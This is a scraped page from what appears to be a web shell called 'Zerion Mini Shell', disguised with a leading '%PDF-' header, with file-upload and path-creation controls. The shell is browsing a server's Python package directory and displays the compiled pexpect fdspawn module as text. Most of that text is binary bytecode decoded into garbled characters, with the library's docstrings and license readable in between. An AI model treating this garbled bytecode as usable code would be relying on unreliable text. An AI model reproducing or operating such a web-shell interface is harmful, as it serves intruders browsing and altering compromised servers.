%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /lib/python3/dist-packages/pexpect/__pycache__/
Upload File :
Create Path :
Current File : //lib/python3/dist-packages/pexpect/__pycache__/fdpexpect.cpython-312.pyc

�

��eg��X�dZddlmZddlmZmZddlmZmZddl	Z	dgZ
Gd�de�Zy)	aThis is like :mod:`pexpect`, but it will work with any file descriptor that you
pass it. You are responsible for opening and close the file descriptor.
This allows you to use Pexpect with sockets and named pipes (FIFOs).

.. note::
    socket.fileno() does not give a readable file descriptor on windows.
    Use :mod:`pexpect.socket_pexpect` for cross-platform socket support

PEXPECT LICENSE

    This license is approved by the OSI and FSF as GPL-compatible.
        http://opensource.org/licenses/isc-license.txt

    Copyright (c) 2012, Noah Spurrier <noah@noah.org>
    PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
    PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
    COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
    THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
    WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
    MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
    ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
    WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
    ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
    OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

�)�	SpawnBase)�ExceptionPexpect�TIMEOUT)�select_ignore_interrupts�poll_ignore_interrupts�N�fdspawnc�\��eZdZdZ		dd�Zd�Zd�Zdd�Zd�Zd�Z	d�Z
d	�Zd
�fd
�	Z�xZ
S)r	z�This is like pexpect.spawn but allows you to supply your own open file
    descriptor. For example, you could use it to read through a file looking
    for patterns, or to control a modem or serial device. c
	��t|�td�k7rt|d�r|j�}t|�td�k7rtd��	t	j
|�d|_d|_tj|||||||��||_d|_d|_
d|z|_|	|_y#t$rtd��wxYw)	z�This takes a file descriptor (an int) or an object that support the
        fileno() method (returning an int). All Python file-like objects
        support fileno(). r�filenozdThe fd argument is not an int. If this is a command string then maybe you want to use pexpect.spawn.z/The fd argument is not a valid file descriptor.N)�encoding�codec_errorsFz<file descriptor %d>)�type�hasattrrr�os�fstat�OSError�args�commandr�__init__�child_fd�own_fd�closed�name�use_poll)
�self�fdr�timeout�maxread�searchwindowsize�logfiler
rrs
          �3/usr/lib/python3/dist-packages/pexpect/fdpexpect.pyrzfdspawn.__init__(s�����8�t�A�w��7�2�x�#8�����B���8�t�A�w��"�$J�K�
K�	V��H�H�R�L���	�������4��'�3C�W�$,�<�	I���
�������*�R�/��	� ��
���	V�"�#T�U�U�	V�s�B=�=Cc��|jdk(ry|j�tj|j�d|_d|_y)z�Close the file descriptor.

        Calling this method a second time does nothing, but if the file
        descriptor was closed elsewhere, :class:`OSError` will be raised.
        ���NT)r�flushr�closer�rs r"r&z
fdspawn.closeCs:���=�=�B����
�
��
���������
����c�r�|jdk(ry	tj|j�y#YyxYw)z�This checks if the file descriptor is still valid. If :func:`os.fstat`
        does not raise an exception then we assume it is alive. r$FT)rrrr's r"�isalivezfdspawn.isaliveQs5���=�=�B���	��H�H�T�]�]�#���	��s�2�6c��td��)z1Deprecated and invalid. Just raises an exception.z.This method is not valid for file descriptors.)r)r�forces  r"�	terminatezfdspawn.terminate]s���O�P�Pr(c���|j|�}|j|d�|jj|d��}t	j
|j|�S)z+Write to fd, return number of bytes written�sendF)�final)�_coerce_send_string�_log�_encoder�encoder�writer)r�s�bs   r"r/zfdspawn.senddsN���$�$�Q�'���	�	�!�V���M�M� � ��%� �0���x�x��
�
�q�)�)r(c�`�|j|�}|j||jz�S)zAWrite to fd with trailing newline, return number of bytes written)r1r/�linesep�rr6s  r"�sendlinezfdspawn.sendlinels*���$�$�Q�'���y�y��T�\�\�)�*�*r(c�&�|j|�y)zWrite to fd, return NoneN)r/r:s  r"r5z
fdspawn.writeqs
���	�	�!�r(c�4�|D]}|j|��y)z+Call self.write() for each item in sequenceN)r5)r�sequencer6s   r"�
writelineszfdspawn.writelinesus���	�A��J�J�q�M�	r(c���tjdk(rf|dk(r|j}|jg}g}g}|jr
t||�}nt
||||�\}}}|j|vrtd��tt|�+|�S)a�
        Read from the file descriptor and return the result as a string.

        The read_nonblocking method of :class:`SpawnBase` assumes that a call
        to os.read will not block (timeout parameter is ignored). This is not
        the case for POSIX file-like objects such as sockets and serial ports.

        Use :func:`select.select`, timeout is implemented conditionally for
        POSIX systems.

        :param int size: Read at most *size* bytes.
        :param int timeout: Wait timeout seconds for file descriptor to be
            ready to read. When -1 (default), use self.timeout. When 0, poll.
        :return: String containing the bytes read
        �posixr$zTimeout exceeded.)rrrrrrrr�superr	�read_nonblocking)r�sizer�rlist�wlist�xlist�	__class__s      �r"rCzfdspawn.read_nonblockingzs���� �7�7�g���"�}��,�,���]�]�O�E��E��E��}�}�.�u�g�>��&>��5�%��'�#��u�e��}�}�E�)��1�2�2��W�d�4�T�:�:r()N�i�NNN�strictF)F)rr$)�__name__�
__module__�__qualname__�__doc__rr&r*r-r/r;r5r?rC�
__classcell__)rHs@r"r	r	#sE���>�SW�OT�!�6�
�Q�*�+�
��
;�;r()rN�	spawnbaser�
exceptionsrr�utilsrrr�__all__r	�r(r"�<module>rUs-���6!�1�C�	��+��u;�i�u;r(

Zerion Mini Shell 1.0